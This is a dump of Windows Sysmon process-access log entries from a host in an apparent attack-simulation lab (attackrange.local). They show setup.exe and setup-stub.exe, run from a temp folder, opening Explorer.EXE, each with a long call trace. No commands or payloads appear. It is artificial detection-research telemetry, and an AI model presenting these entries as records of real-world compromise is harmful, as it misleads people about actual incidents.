13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 